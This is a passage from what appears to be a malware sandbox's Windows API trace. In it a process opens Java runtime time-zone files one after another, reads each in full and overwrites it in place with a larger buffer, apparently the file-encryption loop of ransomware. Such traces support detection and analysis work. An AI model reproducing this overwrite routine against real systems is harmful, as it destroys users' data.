returned 1 [0136.337] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yakutsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.338] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.338] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x245 [0136.339] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.339] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.339] ReleaseMutex (hMutex=0x168) returned 1 [0136.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yakutsk", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yakutsk", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yakutsk", lpUsedDefaultChar=0x0) returned 7 [0136.339] ReadFile (in: hFile=0x208, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x245, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2e9f2bc*=0x245, lpOverlapped=0x0) returned 1 [0136.340] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.340] WriteFile (in: hFile=0x208, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7cd, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x7cd, lpOverlapped=0x0) returned 1 [0136.340] CloseHandle (hObject=0x208) returned 1 [0136.340] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\madeira"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0139.948] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0139.948] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x748 [0139.948] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0139.948] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.948] ReleaseMutex (hMutex=0x168) returned 1 [0139.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Madeira", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0139.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Madeira", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Madeira", lpUsedDefaultChar=0x0) returned 7 [0139.948] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a3b68, nNumberOfBytesToRead=0x748, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesRead=0x2e9f2bc*=0x748, lpOverlapped=0x0) returned 1 [0140.675] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0140.676] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xcd0, lpOverlapped=0x0) returned 1 [0140.676] CloseHandle (hObject=0x1d4) returned 1 [0140.676] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\currie"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0140.677] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0140.677] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4c8 [0140.677] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0140.677] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.015] ReleaseMutex (hMutex=0x168) returned 1 [0141.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Currie", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Currie", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Currie", lpUsedDefaultChar=0x0) returned 6 [0141.015] ReadFile (in: hFile=0x1d4, lpBuffer=0x286d468, nNumberOfBytesToRead=0x4c8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286d468*, lpNumberOfBytesRead=0x2e9f2bc*=0x4c8, lpOverlapped=0x0) returned 1 [0141.022] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.022] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa50, lpOverlapped=0x0) returned 1 [0141.022] CloseHandle (hObject=0x1d4) returned 1 [0141.023] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\sydney"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.024] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.024] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4c8 [0141.024] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.024] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.029] ReleaseMutex (hMutex=0x168) returned 1 [0141.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sydney", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sydney", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sydney", lpUsedDefaultChar=0x0) returned 6 [0141.030] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x4c8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2e9f2bc*=0x4c8, lpOverlapped=0x0) returned 1 [0141.044] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.044] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa50, lpOverlapped=0x0) returned 1 [0141.044] CloseHandle (hObject=0x1d4) returned 1 [0141.045] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+10"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.045] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.045] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1b [0141.045] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.045] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.060] ReleaseMutex (hMutex=0x168) returned 1 [0141.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+10", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+10", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+10", lpUsedDefaultChar=0x0) returned 6 [0141.060] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x2e9f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.061] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.061] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.062] CloseHandle (hObject=0x1d4) returned 1 [0141.062] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.062] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.063] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1b [0141.063] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.063] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.073] ReleaseMutex (hMutex=0x168) returned 1 [0141.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+7", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+7", cchWideChar=5, lpMultiByteStr=0x1f7ad44, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+7", lpUsedDefaultChar=0x0) returned 5 [0141.073] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x2e9f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.074] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.074] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.075] CloseHandle (hObject=0x1d4) returned 1 [0141.075] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-14"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.076] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.076] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1b [0141.076] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.076] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.083] ReleaseMutex (hMutex=0x168) returned 1 [0141.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-14", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-14", cchWideChar=6, lpMultiByteStr=0x1f7ad44, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-14", lpUsedDefaultChar=0x0) returned 6 [0141.083] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x2e9f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.085] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.085] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.085] CloseHandle (hObject=0x1d4) returned 1 [0141.086] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.086] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.086] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1b [0141.086] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.086] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.098] ReleaseMutex (hMutex=0x168) returned 1 [0141.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-9", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-9", cchWideChar=5, lpMultiByteStr=0x1f7ad5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-9", lpUsedDefaultChar=0x0) returned 5 [0141.098] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x2e9f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.099] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.100] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.100] CloseHandle (hObject=0x1d4) returned 1 [0141.100] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\brussels"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.101] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.101] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x61c [0141.101] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.101] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.113] ReleaseMutex (hMutex=0x168) returned 1 [0141.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Brussels", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Brussels", cchWideChar=8, lpMultiByteStr=0x1f735ac, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Brussels", lpUsedDefaultChar=0x0) returned 8 [0141.114] ReadFile (in: hFile=0x1d4, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x61c, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x2e9f2bc*=0x61c, lpOverlapped=0x0) returned 1 [0141.163] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.163] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xba4, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2e9f2d0*=0xba4, lpOverlapped=0x0) returned 1 [0141.163] CloseHandle (hObject=0x1d4) returned 1 [0141.163] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\istanbul"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.192] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.192] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x5b8 [0141.192] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.192] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.192] ReleaseMutex (hMutex=0x168) returned 1 [0141.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Istanbul", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Istanbul", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Istanbul", lpUsedDefaultChar=0x0) returned 8 [0141.193] ReadFile (in: hFile=0x1cc, lpBuffer=0x1effa98, nNumberOfBytesToRead=0x5b8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesRead=0x2e9f2bc*=0x5b8, lpOverlapped=0x0) returned 1 [0141.195] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0141.195] WriteFile (in: hFile=0x1cc, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xb40, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xb40, lpOverlapped=0x0) returned 1 [0141.195] CloseHandle (hObject=0x1cc) returned 1 [0141.196] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\minsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.196] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.197] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x25d [0141.197] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0141.197] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.197] ReleaseMutex (hMutex=0x168) returned 1 [0141.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Minsk", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Minsk", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Minsk", lpUsedDefaultChar=0x0) returned 5 [0141.197] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x25d, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2e9f2bc*=0x25d, lpOverlapped=0x0) returned 